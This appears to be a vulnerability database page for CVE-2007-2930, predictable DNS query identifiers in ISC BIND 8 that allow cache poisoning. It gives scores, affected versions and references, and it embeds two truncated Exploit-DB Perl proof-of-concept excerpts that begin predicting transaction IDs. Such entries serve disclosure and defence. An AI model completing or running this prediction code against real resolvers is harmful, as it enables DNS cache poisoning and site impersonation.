CVE-2007-2930
Published 2007-09-12
Priority: P425 · medium · 4.3 (CVSS 2.0) · AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 7.58% (93.8th percentile)
The (1) NSID_SHUFFLE_ONLY and (2) NSID_USE_POOL PRNG algorithms in ISC BIND 8 before 8.4.7-P1 generate predictable DNS query identifiers when sending outgoing queries such as NOTIFY messages when answering questions as a resolver, which allows remote attackers to poison DNS caches via unknown vectors. NOTE: this issue is different from CVE-2007-2926.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| isc | bind | <= 8.4.7 | — |
CVSS provenance
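| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:N |
| vendor_redhat | — | 4.3 | MEDIUM | — |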
Red Hat
vendor_redhat·CVSS 4.3
Statement: Not vulnerable. This issue did not affect the versions of bind as shipped with Red Hat Enterprise Linux 2.1, 3, 4, or 5.
GHSA
GHSA-8m5r-mf8j-3hfx
ghsa_unreviewed·2022-05-01·CVSS 4.3
No detection rules found.
Exploit-DB
ISC BIND 8 - Remote Cache Poisoning (1)
exploitdb·2007-08-27
---
```perl
#source: https://www.securityfocus.com/bid/25459/info
#
#BIND 8 is prone to a remote cache-poisoning vulnerability because of weaknesses in its random-number generator.
#
#An attacker may leverage this issue to manipulate cache data, potentially facilitating man-in-the-middle, site-impersonation, or denial-of-service attacks.
#
#Versions of BIND from 8.2.0 through to 8.4.7 are vulnerable to this issue.
#
# Window of guessing
# (linear impact on runtime, but also improves success rate)
$WINDOW_SIZE=500;
# How many predictions will be generated per (a,z) candidate
# (actually twice that number)
$PREDICT_SIZE=500;
use Time::HiRes qw(gettimeofday);
# This table is copied as is from the BIND 8.4.7 source code
# (file ./src/bin/named/ns_main.c)
m
```
Exploit-DB
ISC BIND 8 - Remote Cache Poisoning (2)
exploitdb·2007-08-27
---
source: https://www.securityfocus.com/bid/25459/info
BIND 8 is prone to a remote cache-poisoning vulnerability because of weaknesses in its random-number generator.
An attacker may leverage this issue to manipulate cache data, potentially facilitating man-in-the-middle, site-impersonation, or denial-of-service attacks.
Versions of BIND from 8.2.0 through to 8.4.7 are vulnerable to this issue.
```perl
$TRXID1=$ARGV[0];
$TRXID2=$ARGV[1];
$TRXID3=$ARGV[2];
$d1=($TRXID2-$TRXID1) % 65536;
if (($d1 & 1) == 0)
{
    die "Impossible: d1 is even";
}
$d2=($TRXID3-$TRXID2) % 65536;
if (($d2 & 1) == 0)
{
    die "Impossible: d2 is even";
}
# Calculate $inv_d1=($d1)^(-1)
$inv_d1=1;
for (my $b=1;$b<=16;$b++)
{
    if ((($d1*$inv_d1) % (1<<$b))!=1)
    {
        $inv_d1|=(1<<($b-1));
    }
}
```
No writeups or analysis indexed.
References
- http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01283837
- http://secunia.com/advisories/26629
- http://secunia.com/advisories/26858
- http://secunia.com/advisories/27433
- http://secunia.com/advisories/27459
- http://secunia.com/advisories/27465
- http://secunia.com/advisories/27696
- http://sunsolve.sun.com/search/document.do?assetkey=1-26-103063-1
- http://sunsolve.sun.com/search/document.do?assetkey=1-66-200859-1
- http://support.avaya.com/elmodocs2/security/ASA-2007-448.htm
- http://support.nortel.com/go/main.jsp?cscat=BLTNDETAIL&id=653968
- http://www.ciac.org/ciac/bulletins/r-333.shtml
- http://www.isc.org/index.pl?/sw/bind/bind8-eol.php
- http://www.kb.cert.org/vuls/id/927905
- http://www.securityfocus.com/archive/1/477870/100/100/threaded
- http://www.securityfocus.com/archive/1/481424/100/0/threaded
- http://www.securityfocus.com/archive/1/481659/100/0/threaded
- http://www.securityfocus.com/bid/25459
- http://www.securitytracker.com/id?1018615
- http://www.trusteer.com/docs/bind8dns.html
- http://www.vupen.com/english/advisories/2007/2991
- http://www.vupen.com/english/advisories/2007/3192
- http://www.vupen.com/english/advisories/2007/3639
- http://www.vupen.com/english/advisories/2007/3668
- http://www.vupen.com/english/advisories/2007/3936
- http://www116.nortel.com/pub/repository/CLARIFY/DOCUMENT/2007/43/022954-01.pdf
- http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18&ID=3975
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2154